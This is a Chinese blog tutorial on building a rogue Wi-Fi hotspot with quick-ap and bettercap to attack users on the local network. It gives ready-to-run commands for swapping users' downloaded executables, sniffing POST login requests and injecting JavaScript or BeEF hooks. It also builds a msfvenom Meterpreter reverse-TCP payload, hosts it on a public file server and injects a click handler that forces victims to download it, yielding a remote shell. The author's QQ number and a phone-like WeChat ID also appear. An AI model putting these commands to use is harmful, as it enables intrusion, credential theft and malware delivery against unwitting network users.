QUICK-AP + BETTERCAP 搭建热点, 欺骗局域网内用户下载任意可执行文件
环境需求
1:kali系统 , 2.0版本 2:quick-ap 3:bettercap 4:bettercap-proxy-modules 5:博客园账号(把zip文件传到博客园的文件服务器)
主要环境搭建
目的:替换局域网用户的下载文件,变为我们自己定义的下载文件, 这个文件可以为一个恶意的exe或者apk
quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap
需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules
在kali系统中插入usb网卡, 默认的网卡为wlan0, 如果网卡名字不一样的话,后面的脚本中所有的wlan0都要改, 不保证kali的新版本可用, 测试环境的kali版本为2.0
搭建热点
进入quick-ap的目录下, 执行文件,创建热点:
./apd.sh
重新打开一个窗口, 进入bettercap-proxy-modules/http目录下,执行以下命令, 只要用户有下载exe文件或者其他类型的文件, 都会被替换,替换为我们自定义的exe文件, apk或者, rar文件也可以, 思路很多:
bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/file.exe
其他
bettercap-proxy-modules还可以配合beef使用, 修改页面标题, 修改页面样式,嗅探登陆注册的请求信息
修改10. 为 你要攻击的IP .1为网关的地址 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST : 嗅探信息 ---HTTP bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module beefbox.rb --beef-path=/usr/share/beef-xss : 使用beef bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module replace_file.rb --file-extension exe --file-replace /root/Desktop/payload.exe : 设置自定义下载文件 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -T 10.0.0.145 --proxy-module replace_images.rb --httpd-path /root/Desktop : 替换图片 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy-module hack_title.rb : 修改页面标题---JS bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file rainbow.js : 给页面添加一个彩虹 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file resizetext.js : 重新设置页面的字体大小 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectjs --js-file shakescreen.js : 页面图片抖动 --- CSS bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file blurpage.css : 页面模糊 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file flipimages.css : 颠倒图片 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file spinimages.css : 图片旋转 bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X -T 10.0.0.145 --proxy -P POST --proxy-module injectcss --css-file upsidedown.css : 页面颠倒
bettercap还能实现页面插入css, 插入js, 插入html等功能, 这些东西可以参考bettercap的官网 https://www.bettercap.org/docs/proxying/http.html:
InjectJS ( --proxy-module injectjs ) : Used to inject javascript code/files inside HTML pages. InjectCSS ( --proxy-module injectcss ) : Used to inject CSS code/files inside HTML pages. InjectHTML ( --proxy-module injecthtml ) : Used to inject HTML code inside HTML pages.
开始搞事情,入侵你的电脑
msf创建payload文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.0.1 LPORT=1111 -f exe > exe.exe
把生成的exe压缩, 或者用exebind绑定到其它的exe文件上, 再压缩成zip文件, 传到博客园的文件服务器
打开msf控制台:
use exploit/multi/handler set lhost 10.0.0.1 set lport 1111set payload windows/meterpreter/reverse_tcp exploit
监听本地端口:
开始Arp欺骗:bettercap
bettercap -I wlan0 -G 10.0.0.1 --no-spoofing --no-discovery -X --proxy-module=injecthtml --html-data "<script> document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'} </script>"
给所有Http页面添加html代码, 只要用户点击的body标签, 就下载一个rar文件, 用户只要运行这个文件, msf就会返回一个shell
JS代码:document.body.onclick=function(){location.href=http://files.cnblogs.com/files/diligenceday/exe.exe.zip'}的意思是当用户点击页面的时候,会自动下载文件
当用户执行了文件以后, msf控制台就有反应了, 6666
结尾
相对于使用arp欺骗,用户浏览网页的时候会非常卡
但是使用自己创建的热点, 可以在用户毫无察觉的情况下, 给用户添加html代码, 结合beef, 那是相当好玩啊
本文的靶机为自己电脑, 无恶意
相关
youku视频:http://v.youku.com/v_show/id_XMjgwMjc2ODI0OA==.html?spm=a2h3j.8428770.3416059.1
bettercap:https://www.bettercap.org/
youtube视频:https://www.youtube.com/watch?v=y9OYrK4j4_4
quick-ap通过github即可下载:https://github.com/sqqihao/quick-ap
需要bettercap的第三方模块:https://github.com/sqqihao/bettercap-proxy-modules
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
QQ:287101329
微信:18101055830
QUICK-AP + BETTERCAP 搭建热点, 欺骗局域网内用户下载任意可执行文件的更多相关文章
- BeEF 获取同局域网内用户浏览器信息
1.将kali网络适配器改为桥接模式 打开网络适配器,获取权限 修改桥接模式,进行应用 重启网卡 /etc/init.d/networking restart 查看IP地址 查看网络通不通 2.开启B ...
- QUICK-AP + BETTERCAP 替换局域网内其他用户的下载文件为自定义文件
环境需求 :kali系统 , .0版本 :quick-ap :bettercap :bettercap-proxy-modules :...... 主要环境搭建 目的:替换局域网用户的下载文件,变为我 ...
- 中间人攻击-Arp之局域网内DNS欺骗
基础知识 网关是啥? 网关是工作在OSI七层模型中的传输层或者应用层,用于高层协议的不同网络之间的连接,网关就好比一个房间通向另一个房间的一扇门. ARP协议 假设A(192.168.1.2)与B(1 ...
- cubieboard中使用py-kms与dnsmasq搭建局域网内全自动KMS激活环境
众所周知,KMS激活方式是当前广大网民“试用”windows,office的最广泛的激活方式.几乎可以用于微软的全线产品. 但是在本机使用KMS类的激活工具总是有些不放心,一方面每隔180天都要重新激 ...
- 局域网内yum源搭建
在一些环境下,服务器不能连接互联网,但是我们又偏偏需要安装一些软件,此时有点麻烦了.通过使用centos镜像文件,搭建yum本地源,局域网内所有服务器都可以连接这一本地源进行软件的下载和安装,下面具体 ...
- 树莓派上使用KickThemOut对局域网内的设备进行ARP欺骗
安装KickThemOut工具 $ git clone https://github.com/k4m4/kickthemout.git $ cd kickthemout/ $ sudo -H pip ...
- 在内部局域网内搭建HTTPs
在内部局域网内搭建HTTPs 配置环境 Windows版本:Windows Server 2008 R2 Standard Service Pack 1 系统类型: 64 位操作系统 内存 ...
- 不搭建git服务器对git仓库进行局域网内共享多人合作开发项目
有时候在一个临时局域网内没有搭建git服务器,但是又想多人开发一个项目,此时只要每个人电脑安装有git客户端,参考一下方法即可尝试建一个本地化的远程仓库进行多人开发工作. 远程仓库通常只是一个裸仓库( ...
- 局域网内搭建一个服务器,可以使用 https 吗
https://www.v2ex.com/t/472394 这是一个创建于 126 天前的主题,其中的信息可能已经有所发展或是发生改变. 局域网内通过嵌入式设备搭建一个轻量级 web 服务,可以仍然使 ...
随机推荐
- Wireshark的专家模式
-------------------------------本文作为留档文章已备查看----------------------------------- Wireshark的每个协议的解析器(原始 ...
- PHP原生DOM对象操作XML'代码'
对于操作XML类型文件,PHP内置有一套DOM对象可以进行处理.对XML的操作,从创建.添加到修改.删除都可以使用DOM对象中的函数来进行. 创建 创建一个新的XML文件,并且写入一些数据到这个XML ...
- shell中的Mysql查询
1 #!/bin/bash 2 #查询 3 echo -e 4 for i in `cat id.txt` 5 do 6 A=`mysql -h10 -uw -p2012 -Ne "sel ...
- 读入一个自然数n,计算其各位数字之和,用汉语拼音写出和的每一位数字。 输入格式:每个测试输入包含1个测试用例,即给出自然数n的值。这里保证n小于10的100次幂。 输出格式:在一行内输出n的各位数字之和的每一位,拼音数字间有1 空格,但一行中最后一个拼音数字后没有空格。 输入样例: 1234567890987654321123456789 输出样例: yi san wu
这是PAT中的一道练习题 刚开始的时候我想着直接定义正整数n,结果走了很大的弯路,因为题目中要求n小于10的100次幂,即最大的正整数n有100位,而C语言中整型数字最大占8个字节的存储空间,如果按无 ...
- 基于ABP框架的权限设置
需求:在界面展示中,"定向包管理","竞价管理","竞拍管理","发布定向资源","添加竞价资源", ...
- 如何通过 WebP 自适应方案减少图片资源大小
前言 我们知道,理想的网页应该在 1 秒内打开,而在页面的整体大小中,图片往往是所占比例最大的一部分(大约占到 60% 以上,更多了解请点击),也可以参照如下图所示.优化图片不仅可以加快页面显示,还能 ...
- poj2513- Colored Sticks 字典树+欧拉通路判断
题目链接:http://poj.org/problem?id=2513 思路很容易想到就是判断欧拉通路 预处理时用字典树将每个单词和数字对应即可 刚开始在并查集处理的时候出错了 代码: #includ ...
- 学习笔记:JavaScript-入门篇
1.对话框,输出框,警告框 1. document.write() 可用于直接向 HTML 输出流写内容.简单的说就是直接在网页中输出内容. 2.alert(字符串或变量); 3.conf ...
- Python 基本数据类型_常用功能整理
一.字符串 字符串 s ="axle" #去两端空格 s.split() #以什么开头 s.startswith("a") #查找子序列,"12&qu ...
- Centos7.0下将Python更新到Python2.7.13
在云服务器下默认安装的python版本过低,所有我们要手动进行更新(不建议卸载老的版本,然后安装新的,这样会导致大量的异常错误) 为了防止在安装编译python时出错,需先更新gcc :yum - ...